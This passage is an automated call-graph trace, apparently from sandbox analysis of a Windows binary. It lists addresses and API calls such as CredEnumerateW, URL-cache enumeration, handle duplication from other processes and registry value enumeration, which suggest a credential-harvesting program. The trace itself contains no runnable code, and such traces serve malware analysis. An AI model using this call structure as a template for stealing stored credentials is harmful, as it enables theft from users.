SetWindowPlacement 38206->38207 38207->38090 38208->38080 38212 40b58d 38209->38212 38211 40b2d1 38211->38154 38213 40b5a4 GetModuleHandleW FindResourceW 38212->38213 38214 40b62e 38212->38214 38215 40b5c2 LoadResource 38213->38215 38217 40b5e7 38213->38217 38214->38211 38216 40b5d0 SizeofResource LockResource 38215->38216 38215->38217 38216->38217 38217->38214 38225 40afcf 38217->38225 38219 40b608 memcpy 38228 40b4d3 memcpy 38219->38228 38221 40b61e 38229 40b3c1 18 API calls 38221->38229 38223 40b626 38230 40b04b 38223->38230 38226 40b04b ??3@YAXPAX 38225->38226 38227 40afd7 ??2@YAPAXI 38226->38227 38227->38219 38228->38221 38229->38223 38231 40b051 ??3@YAXPAX 38230->38231 38232 40b05f 38230->38232 38231->38232 38232->38214 38233->38098 38235 4032c4 38234->38235 38236 40b633 free 38235->38236 38237 403316 38236->38237 38256 44553b 38237->38256 38241 403480 38454 40368c 15 API calls 38241->38454 38243 403489 38244 40b633 free 38243->38244 38246 403495 38244->38246 38245 40333c 38245->38241 38247 4033a9 memset memcpy 38245->38247 38248 4033ec wcscmp 38245->38248 38452 4028e7 11 API calls 38245->38452 38453 40f508 6 API calls 38245->38453 38246->38100 38247->38245 38247->38248 38248->38245 38251 403421 _wcsicmp 38251->38245 38253 444a64 FreeLibrary 38252->38253 38254 444a83 38252->38254 38253->38254 38254->38100 38255->38101 38257 445548 38256->38257 38258 445599 38257->38258 38455 40c768 38257->38455 38259 4455a8 memset 38258->38259 38266 4457f2 38258->38266 38538 403988 38259->38538 38269 445854 38266->38269 38640 403e2d memset memset memset memset memset 38266->38640 38267 4455e5 38278 445672 38267->38278 38283 44560f 38267->38283 38268 4458bb memset memset 38271 414c2e 17 API calls 38268->38271 38322 4458aa 38269->38322 38663 403c9c memset memset memset memset memset 38269->38663 38274 4458f9 38271->38274 38273 44595e memset memset 38281 414c2e 17 API calls 38273->38281 38282 40b2cc 27 API calls 38274->38282 38276 44558c 38522 444b06 38276->38522 38277 44557a 38277->38276 38736 4136c0 CoTaskMemFree 38277->38736 38549 403fbe memset memset memset memset memset 38278->38549 38279 445a00 memset memset 38686 414c2e 38279->38686 38280 445b22 38286 445bca 38280->38286 38287 445b38 memset memset memset 38280->38287 38291 44599c 38281->38291 38293 445909 38282->38293 38295 4087b3 338 API calls 38283->38295 38285 445849 38752 40b1ab free free 38285->38752 38294 445c8b memset memset 38286->38294 38360 445cf0 38286->38360 38298 445bd4 38287->38298 38299 445b98 38287->38299 38292 40b2cc 27 API calls 38291->38292 38306 4459ac 38292->38306 38303 409d1f 6 API calls 38293->38303 38307 414c2e 17 API calls 38294->38307 38304 445621 38295->38304 38296 44589f 38753 40b1ab free free 38296->38753 38297 445585 38737 41366b FreeLibrary 38297->38737 38313 414c2e 17 API calls 38298->38313 38299->38298 38309 445ba2 38299->38309 38302 403335 38451 4452e5 45 API calls 38302->38451 38317 445919 38303->38317 38738 4454bf 20 API calls 38304->38738 38305 445823 38305->38285 38327 4087b3 338 API calls 38305->38327 38318 409d1f 6 API calls 38306->38318 38319 445cc9 38307->38319 38825 4099c6 wcslen 38309->38825 38310 4456b2 38740 40b1ab free free 38310->38740 38312 40b2cc 27 API calls 38323 445a4f 38312->38323 38314 445be2 38313->38314 38325 40b2cc 27 API calls 38314->38325 38315 445d3d 38345 40b2cc 27 API calls 38315->38345 38316 445d88 memset memset memset 38328 414c2e 17 API calls 38316->38328 38754 409b98 GetFileAttributesW 38317->38754 38329 4459bc 38318->38329 38330 409d1f 6 API calls 38319->38330 38320 445879 38320->38296 38341 4087b3 338 API calls 38320->38341 38322->38268 38346 44594a 38322->38346 38702 409d1f wcslen wcslen 38323->38702 38335 445bf3 38325->38335 38327->38305 38338 445dde 38328->38338 38821 409b98 GetFileAttributesW 38329->38821 38340 445ce1 38330->38340 38331 445bb3 38828 445403 memset 38331->38828 38332 445680 38332->38310 38572 4087b3 memset 38332->38572 38344 409d1f 6 API calls 38335->38344 38336 445928 38336->38346 38755 40b6ef 38336->38755 38347 40b2cc 27 API calls 38338->38347 38845 409b98 GetFileAttributesW 38340->38845 38341->38320 38343 40b2cc 27 API calls 38352 445a94 38343->38352 38354 445c07 38344->38354 38355 445d54 _wcsicmp 38345->38355 38346->38273 38359 4459ed 38346->38359 38358 445def 38347->38358 38348 4459cb 38348->38359 38368 40b6ef 253 API calls 38348->38368 38707 40ae18 38352->38707 38353 44566d 38353->38266 38623 413d4c 38353->38623 38364 445389 259 API calls 38354->38364 38365 445d71 38355->38365 38428 445d67 38355->38428 38357 445665 38739 40b1ab free free 38357->38739 38366 409d1f 6 API calls 38358->38366 38359->38279 38359->38280 38360->38302 38360->38315 38360->38316 38361 445389 259 API calls 38361->38286 38370 445c17 38364->38370 38846 445093 23 API calls 38365->38846 38373 445e03 38366->38373 38368->38359 38369 4456d8 38375 40b2cc 27 API calls 38369->38375 38376 40b2cc 27 API calls 38370->38376 38372 44563c 38372->38357 38378 4087b3 338 API calls 38372->38378 38847 409b98 GetFileAttributesW 38373->38847 38374 40b6ef 253 API calls 38374->38302 38380 4456e2 38375->38380 38381 445c23 38376->38381 38377 445d83 38377->38302 38378->38372 38741 413fa6 _wcsicmp _wcsicmp 38380->38741 38385 409d1f 6 API calls 38381->38385 38383 445e12 38390 445e6b 38383->38390 38397 40b2cc 27 API calls 38383->38397 38388 445c37 38385->38388 38386 445aa1 38389 445b17 38386->38389 38404 445ab2 memset 38386->38404 38417 409d1f 6 API calls 38386->38417 38714 40add4 38386->38714 38719 445389 38386->38719 38728 40ae51 38386->38728 38387 4456eb 38393 4456fd memset memset memset memset 38387->38393 38394 4457ea 38387->38394 38395 445389 259 API calls 38388->38395 38822 40aebe 38389->38822 38849 445093 23 API calls 38390->38849 38742 409c70 wcscpy wcsrchr 38393->38742 38745 413d29 38394->38745 38400 445c47 38395->38400 38401 445e33 38397->38401 38398 445e7e 38403 445f67 38398->38403 38406 40b2cc 27 API calls 38400->38406 38407 409d1f 6 API calls 38401->38407 38412 40b2cc 27 API calls 38403->38412 38408 40b2cc 27 API calls 38404->38408 38410 445c53 38406->38410 38411 445e47 38407->38411 38408->38386 38409 409c70 2 API calls 38413 44577e 38409->38413 38414 409d1f 6 API calls 38410->38414 38848 409b98 GetFileAttributesW 38411->38848 38416 445f73 38412->38416 38418 409c70 2 API calls 38413->38418 38419 445c67 38414->38419 38421 409d1f 6 API calls 38416->38421 38417->38386 38422 44578d 38418->38422 38423 445389 259 API calls 38419->38423 38420 445e56 38420->38390 38426 445e83 memset 38420->38426 38424 445f87 38421->38424 38422->38394 38430 40b2cc 27 API calls 38422->38430 38423->38286 38852 409b98 GetFileAttributesW 38424->38852 38429 40b2cc 27 API calls 38426->38429 38428->38302 38428->38374 38431 445eab 38429->38431 38432 4457a8 38430->38432 38433 409d1f 6 API calls 38431->38433 38434 409d1f 6 API calls 38432->38434 38435 445ebf 38433->38435 38436 4457b8 38434->38436 38437 40ae18 9 API calls 38435->38437 38744 409b98 GetFileAttributesW 38436->38744 38447 445ef5 38437->38447 38439 4457c7 38439->38394 38441 4087b3 338 API calls 38439->38441 38440 40ae51 9 API calls 38440->38447 38441->38394 38442 445f5c 38444 40aebe FindClose 38442->38444 38443 40add4 2 API calls 38443->38447 38444->38403 38445 40b2cc 27 API calls 38445->38447 38446 409d1f 6 API calls 38446->38447 38447->38440 38447->38442 38447->38443 38447->38445 38447->38446 38449 445f3a 38447->38449 38850 409b98 GetFileAttributesW 38447->38850 38851 445093 23 API calls 38449->38851 38451->38245 38452->38251 38453->38245 38454->38243 38456 40c775 38455->38456 38853 40b1ab free free 38456->38853 38458 40c788 38854 40b1ab free free 38458->38854 38460 40c790 38855 40b1ab free free 38460->38855 38462 40c798 38463 40aa04 free 38462->38463 38464 40c7a0 38463->38464 38856 40c274 memset 38464->38856 38469 40a8ab 9 API calls 38470 40c7c3 38469->38470 38471 40a8ab 9 API calls 38470->38471 38472 40c7d0 38471->38472 38885 40c3c3 38472->38885 38476 40c877 38485 40bdb0 38476->38485 38477 40c86c 38927 4053fe 39 API calls 38477->38927 38483 40c7e5 38483->38476 38483->38477 38484 40c634 50 API calls 38483->38484 38910 40a706 38483->38910 38484->38483 39187 404363 38485->39187 38488 40bf5d 39207 40440c 38488->39207 38489 40bdee 38489->38488 38493 40b2cc 27 API calls 38489->38493 38490 40bddf CredEnumerateW 38490->38489 38494 40be02 wcslen 38493->38494 38494->38488 38501 40be1e 38494->38501 38495 40be26 wcsncmp 38495->38501 38498 40be7d memset 38499 40bea7 memcpy 38498->38499 38498->38501 38500 40bf11 wcschr 38499->38500 38499->38501 38500->38501 38501->38488 38501->38495 38501->38498 38501->38499 38501->38500 38502 40b2cc 27 API calls 38501->38502 38504 40bf43 LocalFree 38501->38504 39210 40bd5d 28 API calls 38501->39210 39211 404423 38501->39211 38503 40bef6 _wcsnicmp 38502->38503 38503->38500 38503->38501 38504->38501 38505 4135f7 39226 4135e0 38505->39226 38508 40b2cc 27 API calls 38509 41360d 38508->38509 38510 40a804 8 API calls 38509->38510 38511 413613 38510->38511 38512 41361b 38511->38512 38513 41363e 38511->38513 38514 40b273 27 API calls 38512->38514 38515 4135e0 FreeLibrary 38513->38515 38516 413625 GetProcAddress 38514->38516 38517 413643 38515->38517 38516->38513 38518 413648 38516->38518 38517->38277 38519 413658 38518->38519 38520 4135e0 FreeLibrary 38518->38520 38519->38277 38521 413666 38520->38521 38521->38277 39229 4449b9 38522->39229 38525 444c1f 38525->38258 38526 4449b9 42 API calls 38528 444b4b 38526->38528 38527 444c15 38530 4449b9 42 API calls 38527->38530 38528->38527 39250 444972 GetVersionExW 38528->39250 38530->38525 38531 444b99 memcmp 38536 444b8c 38531->38536 38532 444c0b 39254 444a85 42 API calls 38532->39254 38536->38531 38536->38532 39251 444aa5 42 API calls 38536->39251 39252 40a7a0 GetVersionExW 38536->39252 39253 444a85 42 API calls 38536->39253 38539 40399d 38538->38539 39255 403a16 38539->39255 38541 403a09 39269 40b1ab free free 38541->39269 38543 403a12 wcsrchr 38543->38267 38544 4039a3 38544->38541 38547 4039f4 38544->38547 39266 40a02c CreateFileW 38544->39266 38547->38541 38548 4099c6 2 API calls 38547->38548 38548->38541 38550 414c2e 17 API calls 38549->38550 38551 404048 38550->38551 38552 414c2e 17 API calls 38551->38552 38553 404056 38552->38553 38554 409d1f 6 API calls 38553->38554 38555 404073 38554->38555 38556 409d1f 6 API calls 38555->38556 38557 40408e 38556->38557 38558 409d1f 6 API calls 38557->38558 38559 4040a6 38558->38559 38560 403af5 20 API calls 38559->38560 38561 4040ba 38560->38561 38562 403af5 20 API calls 38561->38562 38563 4040cb 38562->38563 39296 40414f memset 38563->39296 38565 404140 39310 40b1ab free free 38565->39310 38566 4040ec memset 38570 4040e0 38566->38570 38568 404148 38568->38332 38569 4099c6 2 API calls 38569->38570 38570->38565 38570->38566 38570->38569 38571 40a8ab 9 API calls 38570->38571 38571->38570 39323 40a6e6 WideCharToMultiByte 38572->39323 38574 4087ed 39324 4095d9 memset 38574->39324 38577 408809 memset memset memset memset memset 38578 40b2cc 27 API calls 38577->38578 38579 4088a1 38578->38579 38580 409d1f 6 API calls 38579->38580 38581 4088b1 38580->38581 38582 40b2cc 27 API calls 38581->38582 38583 4088c0 38582->38583 38584 409d1f 6 API calls 38583->38584 38585 4088d0 38584->38585 38586 40b2cc 27 API calls 38585->38586 38587 4088df 38586->38587 38588 409d1f 6 API calls 38587->38588 38589 4088ef 38588->38589 38590 40b2cc 27 API calls 38589->38590 38591 4088fe 38590->38591 38592 409d1f 6 API calls 38591->38592 38593 40890e 38592->38593 38594 40b2cc 27 API calls 38593->38594 38595 40891d 38594->38595 38596 409d1f 6 API calls 38595->38596 38597 40892d 38596->38597 39343 409b98 GetFileAttributesW 38597->39343 38604 408953 38604->38332 38624 40b633 free 38623->38624 38625 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38624->38625 38626 413f00 Process32NextW 38625->38626 38627 413da5 OpenProcess 38626->38627 38628 413f17 CloseHandle 38626->38628 38629 413eb0 38627->38629 38630 413df3 memset 38627->38630 38628->38369 38629->38626 38632 413ebf free 38629->38632 38633 4099f4 3 API calls 38629->38633 39767 413f27 38630->39767 38632->38629 38633->38629 38634 413e1f 38635 413e37 GetModuleHandleW 38634->38635 39772 413959 38634->39772 39788 413ca4 38634->39788 38635->38634 38637 413e46 GetProcAddress 38635->38637 38637->38634 38639 413ea2 CloseHandle 38639->38629 38641 414c2e 17 API calls 38640->38641 38642 403eb7 38641->38642 38643 414c2e 17 API calls 38642->38643 38644 403ec5 38643->38644 38645 409d1f 6 API calls 38644->38645 38646 403ee2 38645->38646 38647 409d1f 6 API calls 38646->38647 38648 403efd 38647->38648 38649 409d1f 6 API calls 38648->38649 38650 403f15 38649->38650 38651 403af5 20 API calls 38650->38651 38652 403f29 38651->38652 38653 403af5 20 API calls 38652->38653 38654 403f3a 38653->38654 38655 40414f 33 API calls 38654->38655 38661 403f4f 38655->38661 38656 403faf 39802 40b1ab free free 38656->39802 38658 403f5b memset 38658->38661 38659 403fb7 38659->38305 38660 4099c6 2 API calls 38660->38661 38661->38656 38661->38658 38661->38660 38662 40a8ab 9 API calls 38661->38662 38662->38661 38664 414c2e 17 API calls 38663->38664 38665 403d26 38664->38665 38666 414c2e 17 API calls 38665->38666 38667 403d34 38666->38667 38668 409d1f 6 API calls 38667->38668 38669 403d51 38668->38669 38670 409d1f 6 API calls 38669->38670 38671 403d6c 38670->38671 38672 409d1f 6 API calls 38671->38672 38673 403d84 38672->38673 38674 403af5 20 API calls 38673->38674 38675 403d98 38674->38675 38676 403af5 20 API calls 38675->38676 38677 403da9 38676->38677 38678 40414f 33 API calls 38677->38678 38679 403dbe 38678->38679 38680 403e1e 38679->38680 38682 403dca memset 38679->38682 38684 4099c6 2 API calls 38679->38684 38685 40a8ab 9 API calls 38679->38685 39803 40b1ab free free 38680->39803 38682->38679 38683 403e26 38683->38320 38684->38679 38685->38679 38687 414b81 9 API calls 38686->38687 38689 414c40 38687->38689 38688 414c73 memset 38691 414c94 38688->38691 38689->38688 39804 409cea 38689->39804 39807 414592 RegOpenKeyExW 38691->39807 38694 414c64 SHGetSpecialFolderPathW 38696 414d0b 38694->38696 38695 414cc1 38697 414cf4 wcscpy 38695->38697 39808 414bb0 wcscpy 38695->39808 38696->38312 38697->38696 38699 414cd2 39809 4145ac RegQueryValueExW 38699->39809 38701 414ce9 RegCloseKey 38701->38697 38703 409d62 38702->38703 38704 409d43 wcscpy 38702->38704 38703->38343 38705 409719 2 API calls 38704->38705 38706 409d51 wcscat 38705->38706 38706->38703 38708 40aebe FindClose 38707->38708 38709 40ae21 38708->38709 38710 4099c6 2 API calls 38709->38710 38711 40ae35 38710->38711 38712 409d1f 6 API calls 38711->38712 38713 40ae49 38712->38713 38713->38386 38715 40ade0 38714->38715 38718 40ae0f 38714->38718 38716 40ade7 wcscmp 38715->38716 38715->38718 38717 40adfe wcscmp 38716->38717 38716->38718 38717->38718 38718->38386 38720 40ae18 9 API calls 38719->38720 38721 4453c4 38720->38721 38722 40ae51 9 API calls 38721->38722 38723 4453f3 38721->38723 38724 40add4 2 API calls 38721->38724 38727 445403 254 API calls 38721->38727 38722->38721 38725 40aebe FindClose 38723->38725 38724->38721 38726 4453fe 38725->38726 38726->38386 38727->38721 38729 40ae7b FindNextFileW 38728->38729 38730 40ae5c FindFirstFileW 38728->38730 38731 40ae94 38729->38731 38732 40ae8f 38729->38732 38730->38731 38734 40aeb6 38731->38734 38735 409d1f 6 API calls 38731->38735 38733 40aebe FindClose 38732->38733 38733->38731 38734->38386 38735->38734 38736->38297 38737->38276 38738->38372 38739->38353 38740->38353 38741->38387 38743 409c89 38742->38743 38743->38409 38744->38439 38746 413d39 38745->38746 38747 413d2f FreeLibrary 38745->38747 38748 40b633 free 38746->38748 38747->38746 38749 413d42 38748->38749 38750 40b633 free 38749->38750 38751 413d4a 38750->38751 38751->38266 38752->38269 38753->38322 38754->38336 38756 44db70 38755->38756 38757 40b6fc memset 38756->38757 38758 409c70 2 API calls 38757->38758 38759 40b732 wcsrchr 38758->38759 38760 40b743 38759->38760 38761 40b746 memset 38759->38761 38760->38761 38762 40b2cc 27 API calls 38761->38762 38763 40b76f 38762->38763 38764 409d1f 6 API calls 38763->38764 38765 40b783 38764->38765 39810 409b98 GetFileAttributesW 38765->39810 38767 40b792 38768 40b7c2 38767->38768 38769 409c70 2 API calls 38767->38769 39811 40bb98 38768->39811 38771 40b7a5 38769->38771 38773 40b2cc 27 API calls 38771->38773 38777 40b7b2 38773->38777 38774 40b837 CloseHandle 38776 40b83e memset 38774->38776 38775 40b817 38778 409a45 3 API calls 38775->38778 39844 40a6e6 WideCharToMultiByte 38776->39844 38780 409d1f 6 API calls 38777->38780 38781 40b827 CopyFileW 38778->38781 38780->38768 38781->38776 38782 40b866 38783 444432 121 API calls 38782->38783 38784 40b879 38783->38784 38785 40bad5 38784->38785 38786 40b273 27 API calls 38784->38786 38787 40baeb 38785->38787 38788 40bade DeleteFileW 38785->38788 38789 40b89a 38786->38789 38790 40b04b ??3@YAXPAX 38787->38790 38788->38787 38791 438552 134 API calls 38789->38791 38792 40baf3 38790->38792 38793 40b8a4 38791->38793 38792->38346 38794 40bacd 38793->38794 38796 4251c4 137 API calls 38793->38796 38795 443d90 111 API calls 38794->38795 38795->38785 38819 40b8b8 38796->38819 38797 40bac6 39854 424f26 123 API calls 38797->39854 38798 40b8bd memset 39845 425413 17 API calls 38798->39845 38801 425413 17 API calls 38801->38819 38804 40a71b MultiByteToWideChar 38804->38819 38805 40a734 MultiByteToWideChar 38805->38819 38808 40b9b5 memcmp 38808->38819 38809 4099c6 2 API calls 38809->38819 38810 404423 38 API calls 38810->38819 38813 40bb3e memset memcpy 39855 40a734 MultiByteToWideChar 38813->39855 38814 4251c4 137 API calls 38814->38819 38816 40bb88 LocalFree 38816->38819 38819->38797 38819->38798 38819->38801 38819->38804 38819->38805 38819->38808 38819->38809 38819->38810 38819->38813 38819->38814 38820 40ba5f memcmp 38819->38820 39846 4253ef 16 API calls 38819->39846 39847 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38819->39847 39848 4253af 17 API calls 38819->39848 39849 4253cf 17 API calls 38819->39849 39850 447280 memset 38819->39850 39851 447960 memset memcpy memcpy memcpy 38819->39851 39852 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38819->39852 39853 447920 memcpy memcpy memcpy 38819->39853 38820->38819 38821->38348 38823 40aed1 38822->38823 38824 40aec7 FindClose 38822->38824 38823->38280 38824->38823 38826 4099d7 38825->38826 38827 4099da memcpy 38825->38827 38826->38827 38827->38331 38829 40b2cc 27 API calls 38828->38829 38830 44543f 38829->38830 38831 409d1f 6 API calls 38830->38831 38832 44544f 38831->38832 39944 409b98 GetFileAttributesW 38832->39944 38834 44545e 38835 445476 38834->38835 38836 40b6ef 253 API calls 38834->38836 38837 40b2cc 27 API calls 38835->38837 38836->38835 38838 445482 38837->38838 38839 409d1f 6 API calls 38838->38839 38840 445492 38839->38840 39945 409b98 GetFileAttributesW 38840->39945 38842 4454a1 38843 4454b9 38842->38843 38844 40b6ef 253 API calls 38842->38844 38843->38361 38844->38843 38845->38360 38846->38377 38847->38383 38848->38420 38849->38398 38850->38447 38851->38447 38852->38428 38853->38458 38854->38460 38855->38462 38857 414c2e 17 API calls 38856->38857 38858 40c2ae 38857->38858 38928 40c1d3 38858->38928 38863 40c3be 38880 40a8ab 38863->38880 38864 40afcf 2 API calls 38865 40c2fd FindFirstUrlCacheEntryW 38864->38865 38866 40c3b6 38865->38866 38867 40c31e wcschr 38865->38867 38868 40b04b ??3@YAXPAX 38866->38868 38869 40c331 38867->38869 38870 40c35e FindNextUrlCacheEntryW 38867->38870 38868->38863 38872 40a8ab 9 API calls 38869->38872 38870->38867 38871 40c373 GetLastError 38870->38871 38873 40c3ad FindCloseUrlCache 38871->38873 38874 40c37e 38871->38874 38875 40c33e wcschr 38872->38875 38873->38866 38876 40afcf 2 API calls 38874->38876 38875->38870 38877 40c34f 38875->38877 38878 40c391 FindNextUrlCacheEntryW 38876->38878 38879 40a8ab 9 API calls 38877->38879 38878->38867 38878->38873 38879->38870 39111 40a97a 38880->39111 38883 40a8cc 38883->38469 39117 40b1ab free free 38885->39117 38887 40c3dd 38888 40b2cc 27 API calls 38887->38888 38889 40c3e7 38888->38889 39118 414592 RegOpenKeyExW 38889->39118 38891 40c3f4 38892 40c50e 38891->38892 38893 40c3ff 38891->38893 38907 405337 38892->38907 38894 40a9ce 4 API calls 38893->38894 38895 40c418 memset 38894->38895 39119 40aa1d 38895->39119 38898 40c471 38900 40c47a _wcsupr 38898->38900 38899 40c505 RegCloseKey 38899->38892 39121 40a8d0 7 API calls 38900->39121 38902 40c498 39122 40a8d0 7 API calls 38902->39122 38904 40c4ac memset 38905 40aa1d 38904->38905 38906 40c4e4 RegEnumValueW 38905->38906 38906->38899 38906->38900 39123 405220 38907->39123 38911 4099c6 2 API calls 38910->38911 38912 40a714 _wcslwr 38911->38912 38913 40c634 38912->38913 39180 405361 38913->39180 38916 40c65c wcslen 39183 4053b6 39 API calls 38916->39183 38917 40c71d wcslen 38917->38483 38919 40c677 38920 40c713 38919->38920 39184 40538b 39 API calls 38919->39184 39186 4053df 39 API calls 38920->39186 38923 40c6a5 38923->38920 38924 40c6a9 memset 38923->38924 38925 40c6d3 38924->38925 39185 40c589 44 API calls 38925->39185 38927->38476 38929 40ae18 9 API calls 38928->38929 38935 40c210 38929->38935 38930 40ae51 9 API calls 38930->38935 38931 40c264 38932 40aebe FindClose 38931->38932 38934 40c26f 38932->38934 38933 40add4 2 API calls 38933->38935 38940 40e5ed memset memset 38934->38940 38935->38930 38935->38931 38935->38933 38936 40c231 _wcsicmp 38935->38936 38937 40c1d3 35 API calls 38935->38937 38936->38935 38938 40c248 38936->38938 38937->38935 38953 40c084 22 API calls 38938->38953 38941 414c2e 17 API calls 38940->38941 38942 40e63f 38941->38942 38943 409d1f 6 API calls 38942->38943 38944 40e658 38943->38944 38954 409b98 GetFileAttributesW 38944->38954 38946 40e667 38947 40e680 38946->38947 38948 409d1f 6 API calls 38946->38948 38955 409b98 GetFileAttributesW 38947->38955 38948->38947 38950 40e68f 38951 40c2d8 38950->38951 38956 40e4b2 38950->38956 38951->38863 38951->38864 38953->38935 38954->38946 38955->38950 38977 40e01e 38956->38977 38958 40e593 38959 40e5b0 38958->38959 38960 40e59c DeleteFileW 38958->38960 38961 40b04b ??3@YAXPAX 38959->38961 38960->38959 38963 40e5bb 38961->38963 38962 40e521 38962->38958 39000 40e175 38962->39000 38965 40e5c4 CloseHandle 38963->38965 38966 40e5cc 38963->38966 38965->38966 38968 40b633 free 38966->38968 38967 40e573 38969 40e584 38967->38969 38970 40e57c CloseHandle 38967->38970 38971 40e5db 38968->38971 39043 40b1ab free free 38969->39043 38970->38969 38974 40b633 free 38971->38974 38973 40e540 38973->38967 39020 40e2ab 38973->39020 38975 40e5e3 38974->38975 38975->38951 39044 406214 38977->39044 38980 40e16b 38980->38962 38983 40afcf 2 API calls 38984 40e08d OpenProcess 38983->38984 38985 40e0a4 GetCurrentProcess DuplicateHandle 38984->38985 38989 40e152 38984->38989 38986 40e0d0 GetFileSize 38985->38986 38987 40e14a CloseHandle 38985->38987 39080 409a45 GetTempPathW 38986->39080 38987->38989 38988 40e160 38992 40b04b ??3@YAXPAX 38988->38992 38989->38988 38991 406214 22 API calls 38989->38991 38991->38988 38992->38980 38993 40e0ea 39083 4096dc CreateFileW 38993->39083 38995 40e0f1 CreateFileMappingW 38996 40e140 CloseHandle CloseHandle 38995->38996 38997 40e10b MapViewOfFile 38995->38997 38996->38987 38998 40e13b CloseHandle 38997->38998 38999 40e11f WriteFile UnmapViewOfFile 38997->38999 38998->38996 38999->38998 39001 40e18c 39000->39001 39084 406b90 39001->39084 39004 40e1a7 memset 39010 40e1e8 39004->39010 39005 40e299 39094 4069a3 39005->39094 39011 40e283 39010->39011 39012 40dd50 _wcsicmp 39010->39012 39018 40e244 _snwprintf 39010->39018 39101 406e8f 13 API calls 39010->39101 39102 40742e 8 API calls 39010->39102 39103 40aae3 wcslen wcslen _memicmp 39010->39103 39105 406b53 SetFilePointerEx ReadFile 39010->39105 39013 40e291 39011->39013 39014 40e288 free 39011->39014 39012->39010 39015 40aa04 free 39013->39015 39014->39013 39015->39005 39104 40a8d0 7 API calls 39018->39104 39021 40e2c2 39020->39021 39022 406b90 11 API calls 39021->39022 39028 40e2d3 39022->39028 39023 40e4a0 39024 4069a3 2 API calls 39023->39024 39026 40e4ab 39024->39026 39026->38973 39028->39023 39029 40e489 39028->39029 39032 40dd50 _wcsicmp 39028->39032 39038 40e3e0 memcpy 39028->39038 39039 40e3fb memcpy 39028->39039 39040 40e3b3 wcschr 39028->39040 39041 40e416 memcpy 39028->39041 39042 40e431 memcpy 39028->39042 39106 406e8f 13 API calls 39028->39106 39107 40dd50 _wcsicmp 39028->39107 39109 40742e 8 API calls 39028->39109 39110 406b53 SetFilePointerEx ReadFile 39028->39110 39030 40aa04 free 39029->39030 39031 40e491 39030->39031 39031->39023 39033 40e497 free 39031->39033 39032->39028 39033->39023 39035 40e376 memset 39108 40aa29 6 API calls 39035->39108 39038->39028 39039->39028 39040->39028 39041->39028 39042->39028 39043->38958 39045 406294 CloseHandle 39044->39045 39046 406224 39045->39046 39047 4096c3 CreateFileW 39046->39047 39048 40622d 39047->39048 39049 406281 GetLastError 39048->39049 39050 40a2ef ReadFile 39048->39050 39054 40625a 39049->39054 39051 406244 39050->39051 39051->39049 39052 40624b 39051->39052 39053 406777 19 API calls 39052->39053 39052->39054 39053->39054 39054->38980 39055 40dd85 memset 39054->39055 39056 409bca GetModuleFileNameW 39055->39056 39057 40ddbe CreateFileW 39056->39057 39060 40ddf1 39057->39060 39058 40afcf ??2@YAPAXI ??3@YAXPAX 39058->39060 39059 41352f 9 API calls 39059->39060 39060->39058 39060->39059 39061 40de0b NtQuerySystemInformation 39060->39061 39062 40de3b CloseHandle GetCurrentProcessId 39060->39062 39061->39060 39063 40de54 39062->39063 39064 413d4c 46 API calls 39063->39064 39072 40de88 39064->39072 39065 40e00c 39066 413d29 free FreeLibrary 39065->39066 39067 40e014 39066->39067 39067->38980 39067->38983 39068 40dea9 _wcsicmp 39069 40dee7 OpenProcess 39068->39069 39070 40debd _wcsicmp 39068->39070 39069->39072 39070->39069 39071 40ded0 _wcsicmp 39070->39071 39071->39069 39071->39072 39072->39065 39072->39068 39073 40dfef CloseHandle 39072->39073 39074 40df78 39072->39074 39075 40df23 GetCurrentProcess DuplicateHandle 39072->39075 39078 40df8f CloseHandle 39072->39078 39073->39072 39074->39073 39074->39078 39079 40dfae _wcsicmp 39074->39079 39075->39072 39076 40df4c memset 39075->39076 39077 41352f 9 API calls 39076->39077 39077->39072 39078->39074 39079->39072 39079->39074 39081 409a74 GetTempFileNameW 39080->39081 39082 409a66 GetWindowsDirectoryW 39080->39082 39081->38993 39082->39081 39083->38995 39085 406bd5 39084->39085 39086 406bad 39084->39086 39088 4066bf free malloc memcpy free free 39085->39088 39093 406c0f 39085->39093 39086->39085 39087 406bba _wcsicmp 39086->39087 39087->39085 39087->39086 39089 406be5 39088->39089 39090 40afcf ??2@YAPAXI ??3@YAXPAX 39089->39090 39089->39093 39091 406bff 39090->39091 39092 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 39091->39092 39092->39093 39093->39004 39093->39005 39095 4069c4 ??3@YAXPAX 39094->39095 39096 4069af 39095->39096 39097 40b633 free 39096->39097 39098 4069ba 39097->39098 39099 40b04b ??3@YAXPAX 39098->39099 39100 4069c2 39099->39100 39100->38973 39101->39010 39102->39010 39103->39010 39104->39010 39105->39010 39106->39028 39107->39035 39108->39028 39109->39028 39110->39028 39112 40a980 39111->39112 39113 40a8bb 39112->39113 39114 40a995 _wcsicmp 39112->39114 39115 40a99c wcscmp 39112->39115 39113->38883 39116 40a8d0 7 API calls 39113->39116 39114->39112 39115->39112 39116->38883 39117->38887 39118->38891 39120 40aa23 RegEnumValueW 39119->39120 39120->38898 39120->38899 39121->38902 39122->38904 39124 405335 39123->39124 39125 40522a 39123->39125 39124->38483 39126 40b2cc 27 API calls 39125->39126 39127 405234 39126->39127 39128 40a804 8 API calls 39127->39128 39129 40523a 39128->39129 39168 40b273 39129->39168 39131 405248 _mbscpy _mbscat GetProcAddress 39132 40b273 27 API calls 39131->39132 39133 405279 39132->39133 39171 405211 GetProcAddress 39133->39171 39135 405282 39136 40b273 27 API calls 39135->39136 39137 40528f 39136->39137 39172 405211 GetProcAddress 39137->39172 39139 405298 39140 40b273 27 API calls 39139->39140 39141 4052a5 39140->39141 39173 405211 GetProcAddress 39141->39173 39143 4052ae 39144 40b273 27 API calls 39143->39144 39145 4052bb 39144->39145 39174 405211 GetProcAddress 39145->39174 39147 4052c4 39148 40b273 27 API calls 39147->39148 39149 4052d1 39148->39149 39175 405211 GetProcAddress 39149->39175 39151 4052da 39152 40b273 27 API calls 39151->39152 39153 4052e7 39152->39153 39176 405211 GetProcAddress 39153->39176 39155 4052f0 39156 40b273 27 API calls 39155->39156 39157 4052fd 39156->39157 39177 405211 GetProcAddress 39157->39177 39159 405306 39160 40b273 27 API calls 39159->39160 39161 405313 39160->39161 39178 405211 GetProcAddress 39161->39178 39163 40531c 39164 40b273 27 API calls 39163->39164 39165 405329 39164->39165 39179 405211 GetProcAddress 39165->39179 39169 40b58d 27 API calls 39168->39169 39170 40b18c 39169->39170 39170->39131 39171->39135 39172->39139 39173->39143 39174->39147 39175->39151 39176->39155 39177->39159 39178->39163 39181 405220 39 API calls 